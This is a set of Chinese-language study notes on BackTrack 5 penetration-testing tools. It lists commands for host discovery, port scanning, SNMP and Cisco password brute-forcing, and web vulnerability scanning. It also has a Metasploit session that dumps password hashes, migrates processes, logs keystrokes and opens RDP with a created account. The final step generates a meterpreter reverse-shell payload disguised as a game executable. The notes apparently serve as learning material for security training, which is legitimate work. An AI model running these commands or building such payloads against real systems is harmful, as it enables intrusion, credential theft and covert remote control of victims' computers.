BT5学习笔记

1.配地址:ifconfig eth1 10.1.1.100 netmask 255.255.255.0
  配默认网关:route add default gw 10.1.1.254
  看路由表 netstat -r
  修改DNS etc resolv.conf
2.arping穿越局域网个人电脑防火墙,查看特定IP时候正被使用
  arping -c 3 10.1.1.1
  fping 使用ICMPECHO 能对整个网段快速扫描查看存活主机
  fping -s(打印) -r(ping次数) 1 -g(范围)10.1.1.1  10.1.1.100
  genlist 只显示结果的ping 
  genlist -s 10.1.1.\*
  hping3 能通过的手动自定义产生包
  hping3 回车
  发包:hping send {ip(daddr=10.1.1.1)+icmp(type=8,code=0)}
  收包:hping recv eth1h
  nbtscan 10.1.1.1-254
  nping 允许产生各种网络数据包(TCP,UDP,ICMP,ARP)也允许用户自定义协议头部,如:源和目的,
  TCP和UDP端口号
  nping -c 1 --tcp -p 80 --flags syn 10.1.1.1
  nping -c 1 --tcp -p 80 --flags ack 10.1.1.1(服务器re掉)
  nping -c 1 --udp -p 80 10.1.1.1(端口不可达)
  onesixtyone是一个snmp扫描工具,用于找到设备上的SNMP Community自串
  ./onesixtyone -c dict.txt 10.1.1.2
  protos用于扫描特定主机上支持的协议,特别是路由器
  ./protos -i eth0 -d 10.1.1.1 -v
3.操作系统指纹
  p0f被动的操作系统指纹工具,被动识别技术
  p0f
  主动识别OS指纹探测工具
  xprobe2 10.1.1.1
4.端口扫描
  autoscan
  netifera 功能还行
  nmap -v -n -sP 10.1.1.0/24 比较快的探测活动主机
  nmap -v -n -A 10.1.1.0/24(综合性扫描)
  amap服务探测,对端口号进行查看,检测特定端口的运用
  amap -bq 10.1.1.2 80
  ./httpint -h 10.1.1.1 sigmature.txt
  ike-scan -M -v 10.1.1.2
  sslscan 10.1.1.2 扫描策略
5.漏洞发现
  cisco auditing tool 安全审计工具
  ./CAT -h 10.1.1.2 -w lists/community -a lists/passwords -i
  cisco passwod scanner 发现有默认密码的设备,对一个网段
  ./ciscos 10.1.1 3 -t 4 -C 10
  ADMsnmp 暴力破解snmp
  ./ADMsnmp 10.1.1.2 -wordf snmp.passwd
  ./snmpenum.pl 10.1.1.2 private cisco.txt
  ./snmpeum.pl 10.1.1.1 private windows.txt 在已经知道private密码后,获取一些重要信息
6.HTTP工具
  Burp Suite能够分析和攻击web运用,通过手动和自动的技术
  cd /pentest/web/burpsuite/
  java -jar burpsuite_v1.4.jar
  Grendel Scan 网页漏洞扫描工具
  cd /pentest/web/grendel-scan
  ./grendel.sh
  Nikto2是一个高级web服务器安全扫描工具,扫描检测由于服务器配置失误造成的安全隐患
  /pentest/web/nikto:./nikto.pl -h 10.1.1.1 -C -p 80 -T 3478b -t 3 -D \ v -o webtest -F htm
  W3AF 协助检测攻击web脆弱性
  /pentest/web/w3af:./w3af console
  /help


  w3af/plugins:output console,htmlFile
                output config htmlFile
                set verbose True
                set fileName testreport.html
                back
                output config console
                view
                set verbose False
                back
                audit htaccessMethods,osCommanding,sli,xss
                back
                set target http://10.1.1.1/
                back
                start
  WAFW00F是一个用来探测WAF的工具
   :/pentest/web/waffit:./wafw00f.py http://10.1.1.1/
  Samrdump:用于访问(DCE/RPC)服务,能列出所有的系统服务, 用户账号等
  :/pentest/python/impacket-examples:./sam rdump.py cisco:[email protected] 445/SMB
   
  综合漏洞工具Nesses
  /etc/init.d/nessusd start
7.社会工程学工具
  cd /pentest/exploits/set
  cd config
  nano set config
  cd ..
  ./set


8.运用层攻击MSF
进入MSF :msfconsole
数据库:db_hosts
        db_del_host 10.1.1.2
        db_services
        db nmap -T Aggressive -sV -n -O -v 10.1.1.2
        db_autopwn -h
        db_autopwn -p -t -e/-I 10.1.1.2
        sessions -i 1
        getuid
        run hashdump
        ps 
        misgrate 1576
        keyscan_start
        keyscan_dump
        keyscan_stop
        run getgui -e
        rdesktop 10.1.1.2:3389
        run getgui -u cisco -p cisco
        exit
        exit -y


9.用户名密码
cd /pentest/passwords/
ophacrack -g -d ~/tables_xp_free_small/ -t  ~/tables_xp_small/ -f ~/sam-new-test
10.MSF离线攻击
制造离线攻击脚本:
cd /pentest/exploits/frameworks3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=33333 X > /tmp/newgames.exe

你可能感兴趣的:(BT5学习笔记)